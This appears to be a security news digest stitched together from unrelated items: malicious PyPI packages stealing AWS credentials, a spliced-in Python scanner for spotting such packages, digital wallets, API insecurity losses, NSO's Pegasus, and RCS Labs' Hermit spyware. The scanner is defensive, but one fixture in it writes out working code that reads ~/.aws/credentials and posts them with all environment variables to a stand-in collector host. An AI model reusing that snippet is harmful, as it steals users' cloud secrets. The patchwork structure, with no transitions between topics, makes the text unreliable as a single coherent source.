Researchers have discovered a number of malicious Python packages in the official third-party software repository that are engineered to exfiltrate AWS credentials and environment variables to a publicly exposed endpoint. The list of packages includes loglib-modules, pyg-modules, pygrata, pygrata-utils, and hkg-sol-utils, according to Sonatype security researcher Ax Sharma. The packages, as well as the endpoint, have now been taken down. “Some of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job,” Sharma said.
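Added example, not code from the report or from Sonatype: a small static heuristic a defender can run over a package's source before installing it, flagging the combination the report describes (reading os.environ or AWS credential files together with an outbound HTTP call). The two fixtures, the `scan_source` helper and the `example.invalid` hostname are constructed for this illustration; reading secrets alone is not flagged, since config loaders do that legitimately.

```python
import ast
from dataclasses import dataclass, field

ENV_NAMES = {"environ", "getenv"}                    # os.environ / os.getenv / from os import environ
AWS_MARKERS = (".aws/credentials", ".aws/config", "AWS_SECRET_ACCESS_KEY")
NET_TARGETS = {"requests", "urllib", "httpx", "socket", "http", "urlopen", "urlretrieve"}

@dataclass
class Finding:
    reads_env: bool = False
    reads_aws_creds: bool = False
    network_egress: bool = False
    endpoints: list = field(default_factory=list)
    @property
    def suspicious(self) -> bool:
        # Secret access alone is common (config loaders); pairing it with egress is the signal.
        return (self.reads_env or self.reads_aws_creds) and self.network_egress

def _base_name(func: ast.AST) -> str:
    """Leftmost identifier of a call target: 'requests' for requests.post(...)."""
    while isinstance(func, ast.Attribute):
        func = func.value
    return func.id if isinstance(func, ast.Name) else ""

def scan_source(src: str) -> Finding:
    """Single AST walk recording the indicators and any literal http(s) URLs."""
    finding = Finding()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Attribute) and node.attr in ENV_NAMES:
            finding.reads_env = True
        elif isinstance(node, ast.Name) and node.id in ENV_NAMES:
            finding.reads_env = True
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(m in node.value for m in AWS_MARKERS):
                finding.reads_aws_creds = True
            if node.value.startswith(("http://", "https://")):
                finding.endpoints.append(node.value)
        elif isinstance(node, ast.Call) and _base_name(node.func) in NET_TARGETS:
            finding.network_egress = True
    return finding

# Constructed fixtures (not code from the reported packages).
EXFIL_SAMPLE = '''
import os, requests
creds = open(os.path.expanduser("~/.aws/credentials")).read()
requests.post("https://collector.example.invalid/upload", json={"env": dict(os.environ), "aws": creds})
'''
BENIGN_SAMPLE = '''
import os
DEBUG = os.getenv("APP_DEBUG", "0") == "1"   # reads the environment but never sends it anywhere
'''
```

Run `scan_source` over each module of an unpacked sdist or wheel and review anything where `suspicious` is true, using `endpoints` to check the literal URLs against the collector hosts the report names.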
Imagine a day in the near future when you go to a bank to apply for a loan. Instead of providing a driver’s license, passport or birth certificate to verify your identity, and then filling out forms providing your date of birth, street address, email address, Social Security number and employment status, you simply tap your phone and display a QR code that the bank’s loan office scans to get all that information. That QR code will be generated by your digital wallet, an upgraded version of currently used smartphone payment apps such as Apple Wallet or Google Pay. The digital wallet will be able to electronically access your bank accounts and credit cards and also hold digital versions of government IDs, personal information about you and even tickets for plane flights and events.
Global businesses could be exposing themselves to billions in annual losses because they aren’t properly securing their APIs, according to new research from Imperva. The security firm teamed up with the Marsh McLennan Cyber Risk Analytics Center to analyze nearly 117,000 unique cybersecurity incidents for their report, Quantifying the Cost of API Insecurity. It revealed that vulnerable and unsecured APIs cause an estimated 7.5% of cyber events and losses globally, rising to 18-23% in the IT and information sector. Professional services (10-15%) and retail (6-12%) rounded out the top three. APIs are an increasingly common feature of digital transformation projects – connecting applications, data and experiences. Imperva estimated that around half of businesses have 50-100 APIs deployed internally or publicly, although some have thousands.
NSO Group told European lawmakers this week that “under 50” customers use its notorious Pegasus spyware, though these customers include “more than five” European Union member states. The surveillance-ware maker’s General Counsel Chaim Gelfand refused to answer specific questions about the company’s customers during a European Parliament committee meeting on Thursday. Instead, he frequently repeated the company line that NSO exclusively sells its spyware to government agencies — not private companies or individuals — and only “for the purpose of preventing and investigating terrorism and other serious crimes.”
Google is warning victims in Kazakhstan and Italy that they are being targeted by Hermit, a sophisticated and modular spyware from Italian vendor RCS Labs that can not only steal data but also record and make calls. Google Threat Analysis Group (TAG) researchers Benoit Sevens and Clement Lecigne revealed details in a blog post Thursday about campaigns that send targets a unique link to fake apps impersonating legitimate ones, in an attempt to get them to download and install the spyware. None of the fake apps were found on either Apple’s or Google’s mobile app stores, however, they said.